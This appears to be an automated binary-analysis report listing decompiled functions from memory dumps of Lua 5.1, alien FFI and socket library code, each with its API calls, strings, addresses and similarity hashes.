Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.$L_optlstring.lua_pushnumber.sprintf
String ID: both$invalid shutdown method$receive$send$tcp{client}
API String ID: 926906161-2412307901
Opcode ID: d965a84a4aba8d912625132982ad294d93c98a04a0a620ef5593d5a122e98919
Instruction ID: 781376323c707e6a2a17671aba791231792d18547393cff15981246b55bcf984
Opcode Fuzzy Hash: d965a84a4aba8d912625132982ad294d93c98a04a0a620ef5593d5a122e98919
Instruction Fuzzy Hash: 8531E616A4824B2BDF311A3C1CA2BB66B9E9B77795F194660F8D597392F307880C9250

Uniqueness

Uniqueness Score: -1.00%

Function 100109C0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100109C0(void* __eflags, void* __fp0) {
				void* __ebx;
				void* _t4;
				void* _t5;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;

				_t25 = __fp0;
				_t21 = __eflags;
				_t12 =  *((intOrPtr*)(_t17 + 0x14));
				E1000F410(_t10, __eflags,  *((intOrPtr*)(_t17 + 0x14)), 1, 5);
				_t13 = E1000F600(__eflags, __fp0, _t12, 2, 1);
				_t4 = E10001410(_t21, _t12, 3);
				_t18 = _t17 + 0x20;
				_t22 = _t4;
				if(_t4 > 0) {
					_t5 = E1000F5C0(__eflags, __fp0, _t12, 3);
				} else {
					_t5 = E10001770(_t10, _t22, _t12, 1);
				}
				_t11 = _t5;
				_t19 = _t18 + 8;
				_t16 = _t11 - _t13 + 1;
				if(_t16 > 0) {
					E1000F3E0(_t12, _t16, "table too big to unpack");
					_t20 = _t19 + 0xc;
					__eflags = _t13 - _t11;
					while(__eflags <= 0) {
						E10001C30(__eflags, _t25, _t12, 1, _t13);
						_t20 = _t20 + 0xc;
						_t13 = _t13 + 1;
						__eflags = _t13 - _t11;
					}
					return _t16;
				} else {
					return 0;
				}
			}

0x100109c0
0x100109c0
0x100109c4
0x100109cd
0x100109df
0x100109e1
0x100109e6
0x100109e9
0x100109eb
0x100109fa
0x100109ed
0x100109f0
0x100109f0
0x100109ff
0x10010a01
0x10010a08
0x10010a0b
0x10010a1b
0x10010a20
0x10010a23
0x10010a25
0x10010a2b
0x10010a30
0x10010a33
0x10010a34
0x10010a34
0x10010a3e
0x10010a10
0x10010a13
0x10010a13

APIs

luaL_checktype.LUA5.1(?,00000001,00000005), ref: 100109CD

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

luaL_optinteger.LUA5.1(?,00000002,00000001,?,00000001,00000005), ref: 100109D7

Part of subcall function 1000F600: lua_type.LUA5.1(?,?), ref: 1000F60C

lua_type.LUA5.1(?,00000003,?,00000002,00000001,?,00000001,00000005), ref: 100109E1
lua_objlen.LUA5.1(?,00000001), ref: 100109F0
luaL_checkinteger.LUA5.1(?,00000003), ref: 100109FA
luaL_checkstack.LUA5.1(?,00000000,table too big to unpack), ref: 10010A1B

Part of subcall function 1000F3E0: lua_checkstack.LUA5.1(?,?), ref: 1000F3EB
Part of subcall function 1000F3E0: luaL_error.LUA5.1(?,stack overflow (%s),?), ref: 1000F402

lua_rawgeti.LUA5.1(?,00000001,00000000), ref: 10010A2B

Strings

table too big to unpack, xrefs: 10010A14

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_checkinteger.L_checkstack.L_checktype.L_error.L_optinteger.lua_checkstack.lua_objlen.lua_rawgeti.
String ID: table too big to unpack
API String ID: 2686278310-1688879504
Opcode ID: 481ee2eb98caf4f1dc52a77ae13c14628df95149840e29a7dd4f55bc9e100416
Instruction ID: 54af84c5a5a873da6852ea26aa7f1c3e5c03f07e51342cda2245e601a0b2ed9c
Opcode Fuzzy Hash: 481ee2eb98caf4f1dc52a77ae13c14628df95149840e29a7dd4f55bc9e100416
Instruction Fuzzy Hash: D401DB2779430531F520E4556CC3FFFA55CDF52AD1F000139F640B90C6EAD7A98111A2

Uniqueness

Uniqueness Score: -1.00%

Function 00A22DE0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00A22DE0(intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* _t3;
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t7;
				intOrPtr* _t10;
				intOrPtr _t12;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t17;
				void* _t18;

				_t15 = _a4;
				_t4 = E00A21110(_t3, 1, _t15, "alien_buffer");
				_t10 = _t4;
				_t17 = _t16 + 4;
				if(_t10 == 0) {
					_push("alien buffer expected");
					_push(1);
					_push(_t15);
					L00A23F14();
					_t17 = _t17 + 0xc;
				}
				_push(_t15);
				L00A23F38();
				_t18 = _t17 + 4;
				if(_t4 < 2) {
					L5:
					_t5 = _t10;
					_t2 = _t5 + 1; // 0x1
					_t13 = _t2;
					do {
						_t12 =  *_t5;
						_t5 = _t5 + 1;
					} while (_t12 != 0);
					_t14 = _t5 - _t13;
					_t7 = 0;
				} else {
					_push(2);
					_push(_t15);
					L00A23F4A();
					_t18 = _t18 + 8;
					if(_t4 == 0) {
						goto L5;
					} else {
						_push(2);
						_push(_t15);
						L00A23FCE();
						_push(1);
						_push(3);
						_push(_t15);
						_t14 = _t4;
						L00A23FC2();
						_t18 = _t18 + 0x14;
						_t7 = _t4 - 1;
					}
				}
				_push(_t14);
				_push(_t10 + _t7);
				_push(_t15);
				L00A23FC8();
				return 1;
			}

0x00a22de2
0x00a22df1
0x00a22df6
0x00a22df8
0x00a22dfd
0x00a22dff
0x00a22e04
0x00a22e06
0x00a22e07
0x00a22e0c
0x00a22e0c
0x00a22e0f
0x00a22e10
0x00a22e15
0x00a22e1b
0x00a22e48
0x00a22e48
0x00a22e4a
0x00a22e4a
0x00a22e50
0x00a22e50
0x00a22e52
0x00a22e55
0x00a22e5b
0x00a22e5d
0x00a22e1d
0x00a22e1d
0x00a22e1f
0x00a22e20
0x00a22e25
0x00a22e2a
0x00000000
0x00a22e2c
0x00a22e2c
0x00a22e2e
0x00a22e2f
0x00a22e34
0x00a22e36
0x00a22e38
0x00a22e39
0x00a22e3b
0x00a22e40
0x00a22e43
0x00a22e43
0x00a22e2a
0x00a22e5f
0x00a22e62
0x00a22e63
0x00a22e64
0x00a22e74

APIs

Part of subcall function 00A21110: lua_touserdata.LUA5.1(?,00000001,?,00A22DF6,alien_buffer), ref: 00A21113
Part of subcall function 00A21110: lua_getmetatable.LUA5.1(?,00000001), ref: 00A21123
Part of subcall function 00A21110: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00A2113A
Part of subcall function 00A21110: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 00A21144
Part of subcall function 00A21110: lua_settop.LUA5.1(?,000000FD), ref: 00A21153

luaL_argerror.LUA5.1(?,00000001,alien buffer expected), ref: 00A22E07
lua_gettop.LUA5.1(?), ref: 00A22E10
lua_type.LUA5.1(?,00000002), ref: 00A22E20
luaL_checkinteger.LUA5.1(?,00000002), ref: 00A22E2F
luaL_optinteger.LUA5.1(?,00000003,00000001,?,00000002), ref: 00A22E3B
lua_pushlstring.LUA5.1(?,00000000,-00000001), ref: 00A22E64

Strings

alien_buffer, xrefs: 00A22DE7
alien buffer expected, xrefs: 00A22DFF

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checkinteger.L_optinteger.lua_getfield.lua_getmetatable.lua_gettop.lua_pushlstring.lua_rawequal.lua_settop.lua_touserdata.lua_type.
String ID: alien buffer expected$alien_buffer
API String ID: 3507704453-566560685
Opcode ID: f8c8f807ea92f11a46bf551943ecb09440e776f5c5d4f7d88e2760d581c09faa
Instruction ID: 7b64dbef47f762fc1404575f767e22838d3120e37f591c0dea79f8f2ff887ec4
Opcode Fuzzy Hash: f8c8f807ea92f11a46bf551943ecb09440e776f5c5d4f7d88e2760d581c09faa
Instruction Fuzzy Hash: CC01AC63F5023037EA11657C7E47F9B259A9F57704F154830F904DB282F99ADB1542E2

Uniqueness

Uniqueness Score: -1.00%

Function 00991DA0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00991DA0(void* __eflags, void* __fp0, intOrPtr _a4) {
				void* _t3;
				void* _t12;
				intOrPtr _t13;

				_t13 = _a4;
				_t3 = E00991250(_t13, "tcp{any}", 1);
				_push(0);
				_push(2);
				_push(_t13);
				_t11 = _t3;
				L00994B54();
				_push(3);
				_push(_t13);
				L00994B66();
				L00994BD0();
				_t2 = _t11 + 0x2038; // 0x2038
				_push(E00992DC0(__fp0, _t2));
				_t12 = E009917B0(__fp0, _t3, _t3, _t3);
				E009912A0(_t13, "tcp{client}", 1);
				if(_t12 == 0) {
					_push(0x3ff00000);
					_push(0);
					_push(_t13);
					L00994B5A();
					return 1;
				} else {
					_push(_t13);
					L00994B4E();
					_push(_t12);
					_push(_t13);
					L00994AD0();
					return 2;
				}
			}

0x00991da3
0x00991db0
0x00991db5
0x00991db7
0x00991db9
0x00991dba
0x00991dbc
0x00991dc1
0x00991dc3
0x00991dc6
0x00991dcb
0x00991dd2
0x00991dde
0x00991def
0x00991df1
0x00991dfb
0x00991e17
0x00991e1c
0x00991e1e
0x00991e1f
0x00991e30
0x00991dfd
0x00991dfd
0x00991dfe
0x00991e03
0x00991e04
0x00991e05
0x00991e16
0x00991e16

APIs

Part of subcall function 00991250: sprintf.MSVCRT ref: 0099127F
Part of subcall function 00991250: luaL_argerror.LUA5.1(?,?,?), ref: 0099128C

luaL_checklstring.LUA5.1(?,00000002,00000000,?,tcp{any},00000001), ref: 00991DBC
luaL_checknumber.LUA5.1(?,00000003,?,00000002,00000000,?,tcp{any},00000001), ref: 00991DC6
_ftol.MSVCRT ref: 00991DCB

Part of subcall function 009917B0: htons.WSOCK32 ref: 009917D3

Part of subcall function 009912A0: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 009912B0
Part of subcall function 009912A0: lua_setmetatable.LUA5.1(?,?), ref: 009912C3

lua_pushnil.LUA5.1(?), ref: 00991DFE
lua_pushstring.LUA5.1(?,00000000,?), ref: 00991E05
lua_pushnumber.LUA5.1(?,00000000,3FF00000), ref: 00991E1F

Strings

tcp{any}, xrefs: 00991DAA
tcp{client}, xrefs: 00991DE9

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checklstring.L_checknumber._ftolhtonslua_getfield.lua_pushnil.lua_pushnumber.lua_pushstring.lua_setmetatable.sprintf
String ID: tcp{any}$tcp{client}
API String ID: 128655095-3412755644
Opcode ID: 677b2c2581e389aa8a4904d75f801ac40935d019b77e9f5a5bf4f14be985db56
Instruction ID: 12e6460759fc6443c50291390330ca8d6c3581bd174878c61e50fd63cc91aa0d
Opcode Fuzzy Hash: 677b2c2581e389aa8a4904d75f801ac40935d019b77e9f5a5bf4f14be985db56
Instruction Fuzzy Hash: 0101A472B4231433EE1232AC6C47FEF634C9FC67A5F140162F610E7182EA96A95601FD

Uniqueness

Uniqueness Score: -1.00%

Function 00A22B80, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00A22B80(intOrPtr* __eax, long long __fp0, intOrPtr _a4) {
				intOrPtr _t5;
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;
				void* _t13;
				long long* _t15;
				long long _t21;

				_t21 = __fp0;
				_t10 = _a4;
				_push(0);
				_push(1);
				_push(_t10);
				L00A23F32();
				_push(__eax);
				_push(2);
				_push(_t10);
				L00A23FB0();
				_t11 = __eax;
				_t5 =  *__eax;
				_t13 = _t12 + 0x18;
				if(_t5 == 6) {
					L9:
					_push(_t10);
					L00A23F38();
					return _t5 - 2;
				} else {
					goto L1;
				}
				do {
					L1:
					_t7 = _t5 - 2;
					if(_t7 == 0) {
						asm("fild dword [esi+0x4]");
						_t15 = _t13 - 8;
						 *_t15 = _t21;
						_push(_t10);
						L00A23F80();
						_t13 = _t15 + 0xc;
					} else {
						if(_t7 == 0xa) {
							_t9 =  *((intOrPtr*)(_t11 + 4));
							if(_t9 == 0) {
								_push(_t10);
								L00A23F74();
								_t13 = _t13 + 4;
							} else {
								_push(_t9);
								_push(_t10);
								L00A23F7A();
								_t13 = _t13 + 8;
							}
						} else {
							_push("wrong type in wrapped value");
							_push(_t10);
							L00A23F26();
							_t13 = _t13 + 8;
						}
					}
					_t5 =  *((intOrPtr*)(_t11 + 8));
					_t11 = _t11 + 8;
				} while (_t5 != 6);
				goto L9;
			}

0x00a22b80
0x00a22b82
0x00a22b86
0x00a22b88
0x00a22b8a
0x00a22b8b
0x00a22b90
0x00a22b91
0x00a22b93
0x00a22b94
0x00a22b99
0x00a22b9b
0x00a22b9d
0x00a22ba3
0x00a22bfa
0x00a22bfa
0x00a22bfb
0x00a22c08
0x00000000
0x00000000
0x00000000
0x00a22ba5
0x00a22ba5
0x00a22ba5
0x00a22ba8
0x00a22bdd
0x00a22be0
0x00a22be3
0x00a22be6
0x00a22be7
0x00a22bec
0x00a22baa
0x00a22bad
0x00a22bbf
0x00a22bc4
0x00a22bd2
0x00a22bd3
0x00a22bd8
0x00a22bc6
0x00a22bc6
0x00a22bc7
0x00a22bc8
0x00a22bcd
0x00a22bcd
0x00a22baf
0x00a22baf
0x00a22bb4
0x00a22bb5
0x00a22bba
0x00a22bba
0x00a22bad
0x00a22bef
0x00a22bf2
0x00a22bf5
0x00000000

APIs

luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 00A22B8B
luaL_checkudata.LUA5.1(?,00000002,00000000,?,00000001,00000000), ref: 00A22B94
luaL_error.LUA5.1(?,wrong type in wrapped value), ref: 00A22BB5
lua_pushlightuserdata.LUA5.1(?,?), ref: 00A22BC8
lua_pushnumber.LUA5.1(?), ref: 00A22BE7
lua_gettop.LUA5.1(?), ref: 00A22BFB

Strings

wrong type in wrapped value, xrefs: 00A22BAF

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checklstring.L_checkudata.L_error.lua_gettop.lua_pushlightuserdata.lua_pushnumber.
String ID: wrong type in wrapped value
API String ID: 1197628295-2879723630
Opcode ID: d430c5aa5aeaa98644daa9b85b6cb6625a230bdac5b3ab9b9922ea410e4a43ac
Instruction ID: 5796736de3265db917574805b11f737b646a5253609c7ec0349d8ed405a13341
Opcode Fuzzy Hash: d430c5aa5aeaa98644daa9b85b6cb6625a230bdac5b3ab9b9922ea410e4a43ac
Instruction Fuzzy Hash: 9E01A273D0412176D9357A2CBE8BF3F73784B83B10F084539F84999249EA199E5592A3

Uniqueness

Uniqueness Score: -1.00%

Function 10010C60, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010C60(void* __ebx, void* __ecx, void* __eflags, intOrPtr _a4) {
				void* __esi;
				intOrPtr _t18;
				void* _t19;
				void* _t21;
				void* _t22;

				_t20 = _a4;
				_t18 = E10001840(__eflags, _a4, 1);
				_t22 = _t21 + 8;
				_t27 = _t18;
				if(_t18 == 0) {
					E1000F090(__ebx, _t20, _t27, _t20, 1, "coroutine expected");
					_t22 = _t22 + 0xc;
				}
				_t19 = E10010CE0(_t20, _t18, E10001150(_t20) - 1);
				_t28 = _t19;
				if(_t19 >= 0) {
					__eflags = (E10001AE0(_t20, 1) | 0xffffffff) - _t19;
					E100012B0((E10001AE0(_t20, 1) | 0xffffffff) - _t19, _t20, (E10001AE0(_t20, 1) | 0xffffffff) - _t19);
					_t2 = _t19 + 1; // 0x1
					return _t2;
				} else {
					E10001AE0(_t20, 0);
					E100012B0(_t28, _t20, 0xfffffffe);
					return 2;
				}
			}

0x10010c61
0x10010c6e
0x10010c70
0x10010c73
0x10010c75
0x10010c7f
0x10010c84
0x10010c84
0x10010c96
0x10010c9b
0x10010c9d
0x10010cc5
0x10010cc9
0x10010cd1
0x10010cd6
0x10010c9f
0x10010ca2
0x10010caa
0x10010cb9
0x10010cb9

APIs

lua_tothread.LUA5.1(?,00000001), ref: 10010C69
luaL_argerror.LUA5.1(?,00000001,coroutine expected), ref: 10010C7F

Part of subcall function 1000F090: lua_getstack.LUA5.1(?,00000000), ref: 1000F0A0
Part of subcall function 1000F090: luaL_error.LUA5.1(?,bad argument #%d (%s),?,?), ref: 1000F0BC

lua_gettop.LUA5.1(?), ref: 10010C88
lua_pushboolean.LUA5.1(?,00000000), ref: 10010CA2
lua_insert.LUA5.1(?,000000FE,?,00000000), ref: 10010CAA
lua_pushboolean.LUA5.1(?,00000001), ref: 10010CBD
lua_insert.LUA5.1(?,00000000,?,00000001), ref: 10010CC9

Strings

coroutine expected, xrefs: 10010C77

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_insert.lua_pushboolean.$L_argerror.L_error.lua_getstack.lua_gettop.lua_tothread.
String ID: coroutine expected
API String ID: 3459704936-3001328647
Opcode ID: f08ed33f8803161433fa24a3da4b515019ca68c4f5d3ce97b35c2f7801da415f
Instruction ID: a3048538ea0917ae930ddf6640a8ee05e40c27afc8ffdcd82d71cd8df59a7dcb
Opcode Fuzzy Hash: f08ed33f8803161433fa24a3da4b515019ca68c4f5d3ce97b35c2f7801da415f
Instruction Fuzzy Hash: 51F0963A65592132F512E2286D03FEF155ECFC23F1F150315F924AA1C7FBA9A69201FA

Uniqueness

Uniqueness Score: -1.00%

Function 00991530, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47
networkCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00991530(long long __fp0, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v30;
				signed int _t10;
				intOrPtr _t18;
				intOrPtr _t19;
				void* _t20;

				_t20 =  &_v20;
				_push(_t20);
				_t10 =  *_a8;
				_push( &_v16);
				_push(_t10);
				_v20 = 0x10;
				L00994A22();
				if(_t10 >= 0) {
					_push(_v24);
					L00994A10();
					_t18 = _v12;
					_push(_t10);
					_push(_t18);
					L00994AD0();
					_push(_v30);
					L00994A1C();
					_v16 = _t10 & 0x0000ffff;
					asm("fild dword [esp+0x24]");
					 *((long long*)(_t20 + 8 - 8)) = __fp0;
					_push(_t18);
					L00994B5A();
					return 2;
				} else {
					_t19 = _v8;
					_push(_t19);
					L00994B4E();
					_push("getpeername failed");
					_push(_t19);
					L00994AD0();
					return 2;
				}
			}

0x00991530
0x0099153c
0x0099153d
0x00991543
0x00991544
0x00991545
0x0099154d
0x00991554
0x0099157c
0x0099157d
0x00991582
0x00991586
0x00991587
0x00991588
0x00991594
0x00991595
0x009915a2
0x009915a6
0x009915aa
0x009915ad
0x009915ae
0x009915bf
0x00991556
0x00991556
0x0099155a
0x0099155b
0x00991560
0x00991565
0x00991566
0x00991577
0x00991577

APIs

getpeername.WSOCK32 ref: 0099154D
lua_pushnil.LUA5.1(?), ref: 0099155B
lua_pushstring.LUA5.1(?,getpeername failed,?), ref: 00991566
inet_ntoa.WSOCK32(?), ref: 0099157D
lua_pushstring.LUA5.1(?,00000000,?), ref: 00991588
htons.WSOCK32(?), ref: 00991595
lua_pushnumber.LUA5.1(?), ref: 009915AE

Strings

getpeername failed, xrefs: 00991560

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushstring.$getpeernamehtonsinet_ntoalua_pushnil.lua_pushnumber.
String ID: getpeername failed
API String ID: 1379988920-3510183359
Opcode ID: 059a4dc9bc546e4911efaa90854e7962fe71a8d8a4aee999ebd7c52b1b31e753
Instruction ID: 69f9f87462a83af2c2f88950fa0da2ffde0290128ce3b43d3afda8cc8345131e
Opcode Fuzzy Hash: 059a4dc9bc546e4911efaa90854e7962fe71a8d8a4aee999ebd7c52b1b31e753
Instruction Fuzzy Hash: FF01A7B14096116BCB01FB1CDC42F5F77E8AFC4308F454968F48557241E638D91A87EB

Uniqueness

Uniqueness Score: -1.00%

Function 00A21E70, Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00A21E70(intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* _t5;
				intOrPtr* _t6;
				char* _t7;
				intOrPtr* _t9;
				intOrPtr _t12;
				char* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;

				_t14 = _a4;
				_t6 = E00A21110(_t5, 1, _t14, "alien_function");
				_t16 = _t15 + 4;
				if(_t6 == 0) {
					_t9 = E00A21110(_t6, 1, _t14, "alien_callback");
					_t16 = _t16 + 4;
					if(_t9 == 0) {
						_push("alien function or callback expected");
						_push(1);
						_push(_t14);
						L00A23F14();
						_t16 = _t16 + 0xc;
						_t6 = 0;
					} else {
						_t6 =  *((intOrPtr*)( *_t9 + 0x18));
					}
				}
				_t12 =  *_t6;
				if(_t12 == 0) {
					L6:
					_t13 = "default";
					goto L7;
				} else {
					_t13 =  *(_t12 + 4);
					if(_t13 != 0) {
						L7:
						_t7 =  *(_t6 + 8);
						if(_t7 == 0) {
							_t7 = "anonymous";
						}
						_push(_t13);
						_push(_t7);
						_push("alien function %s, library %s");
						_push(_t14);
						L00A23EEA();
						return 1;
					}
					goto L6;
				}
			}

0x00a21e72
0x00a21e80
0x00a21e85
0x00a21e8a
0x00a21e91
0x00a21e96
0x00a21e9b
0x00a21ea4
0x00a21ea9
0x00a21eab
0x00a21eac
0x00a21eb1
0x00a21eb4
0x00a21e9d
0x00a21e9f
0x00a21e9f
0x00a21e9b
0x00a21eb6
0x00a21eba
0x00a21ec3
0x00a21ec3
0x00000000
0x00a21ebc
0x00a21ebc
0x00a21ec1
0x00a21ec8
0x00a21ec8
0x00a21ecd
0x00a21ecf
0x00a21ecf
0x00a21ed4
0x00a21ed5
0x00a21ed6
0x00a21edb
0x00a21edc
0x00a21eeb
0x00a21eeb
0x00000000
0x00a21ec1

APIs

Part of subcall function 00A21110: lua_touserdata.LUA5.1(?,00000001,?,00A22DF6,alien_buffer), ref: 00A21113
Part of subcall function 00A21110: lua_getmetatable.LUA5.1(?,00000001), ref: 00A21123
Part of subcall function 00A21110: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00A2113A
Part of subcall function 00A21110: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 00A21144
Part of subcall function 00A21110: lua_settop.LUA5.1(?,000000FD), ref: 00A21153

lua_pushfstring.LUA5.1(?,alien function %s, library %s,?,default), ref: 00A21EDC

Part of subcall function 00A21110: lua_settop.LUA5.1(?,000000FD), ref: 00A2115F

luaL_argerror.LUA5.1(?,00000001,alien function or callback expected), ref: 00A21EAC

Strings

anonymous, xrefs: 00A21ECF
alien_function, xrefs: 00A21E76
alien_callback, xrefs: 00A21E8C
alien function %s, library %s, xrefs: 00A21ED6
default, xrefs: 00A21EC3, 00A21ED4
alien function or callback expected, xrefs: 00A21EA4

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_settop.$L_argerror.lua_getfield.lua_getmetatable.lua_pushfstring.lua_rawequal.lua_touserdata.
String ID: alien function %s, library %s$alien function or callback expected$alien_callback$alien_function$anonymous$default
API String ID: 3822316347-4138184908
Opcode ID: 6c1e832c9d0e147e248a6271592fadcbac27a99a6d0d919ef48c6d87131e1d43
Instruction ID: 0a9ab510093716030a0a32f146654247fc5147f2ad66e530c149f8becc8e6e16
Opcode Fuzzy Hash: 6c1e832c9d0e147e248a6271592fadcbac27a99a6d0d919ef48c6d87131e1d43
Instruction Fuzzy Hash: 3EF0C271F40630ABEB18D62CBD82F7A3299AF65754F090878FD05DF292E2B1DD5082A1

Uniqueness

Uniqueness Score: -1.00%

Function 00993650, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00993650(void* __eax, intOrPtr _a4) {
				void* _t4;
				intOrPtr _t5;
				void* _t6;
				void* _t7;

				_t5 = _a4;
				_push("dirty");
				_push(_t5);
				_t4 = 0;
				L00994AD0();
				_push(0xfffffffe);
				_push(_t5);
				L00994B00();
				_push(0xffffffff);
				_push(_t5);
				L00994AFA();
				_t7 = _t6 + 0x18;
				if(__eax != 0) {
					_push(0xfffffffe);
					_push(_t5);
					L00994B90();
					_push(1);
					_push(1);
					_push(_t5);
					L00994BC0();
					_push(0xffffffff);
					_push(_t5);
					L00994B18();
					_t7 = _t7 + 0x1c;
					_t4 = __eax;
				}
				_push(0xfffffffe);
				_push(_t5);
				L00994AB8();
				return _t4;
			}

0x00993651
0x00993656
0x0099365b
0x0099365c
0x0099365e
0x00993663
0x00993665
0x00993666
0x0099366b
0x0099366d
0x0099366e
0x00993673
0x00993678
0x0099367a
0x0099367c
0x0099367d
0x00993682
0x00993684
0x00993686
0x00993687
0x0099368c
0x0099368e
0x0099368f
0x00993694
0x00993697
0x00993697
0x00993699
0x0099369b
0x0099369c
0x009936a8

APIs

lua_pushstring.LUA5.1(009935B1,dirty,?,000000FF,009935B1,000000FF), ref: 0099365E
lua_gettable.LUA5.1(009935B1,000000FE,009935B1,dirty,?,000000FF,009935B1,000000FF), ref: 00993666
lua_type.LUA5.1(009935B1,000000FF,009935B1,000000FE,009935B1,dirty,?,000000FF,009935B1,000000FF), ref: 0099366E
lua_pushvalue.LUA5.1(009935B1,000000FE,?,?,?,000000FF,009935B1,000000FF), ref: 0099367D
lua_call.LUA5.1(009935B1,00000001,00000001,009935B1,000000FE,?,?,?,000000FF,009935B1,000000FF), ref: 00993687
lua_toboolean.LUA5.1(009935B1,000000FF,009935B1,00000001,00000001,009935B1,000000FE,?,?,?,000000FF,009935B1,000000FF), ref: 0099368F
lua_settop.LUA5.1(009935B1,000000FE,?,?,?,000000FF,009935B1,000000FF), ref: 0099369C

Strings

dirty, xrefs: 00993656

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_call.lua_gettable.lua_pushstring.lua_pushvalue.lua_settop.lua_toboolean.lua_type.
String ID: dirty
API String ID: 1811909338-3644938061
Opcode ID: 4796256d7e268d173b5bc1796e400875b3bb1527d8b152e7860e322b0da00a4f
